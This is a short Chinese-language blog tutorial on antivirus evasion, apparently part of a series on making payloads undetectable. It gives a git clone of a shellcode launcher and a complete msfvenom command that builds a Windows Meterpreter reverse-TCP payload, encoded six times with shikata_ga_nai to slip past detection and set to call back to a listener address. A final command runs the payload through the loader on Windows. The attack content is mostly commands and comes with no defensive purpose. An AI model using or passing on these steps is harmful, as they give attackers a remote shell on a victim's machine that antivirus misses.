2023年将会持续于B站、CSDN等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。
【商务合作请私信或进群联系群主】
一、原理
原理:分离免杀,用法C#语言shellcode图片加载
下载:
git clone https://github.com/clinicallyinane/shellcode_launcher/
二、操作
Msfvenom生成raw格式的shellcode:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f raw -o shellcode.raw
免杀分析:raw本身是没啥危害的,但是shellcode加载器必须进行免杀才能上传。
WIN上:shellcode_launcher.exe –I shell.raw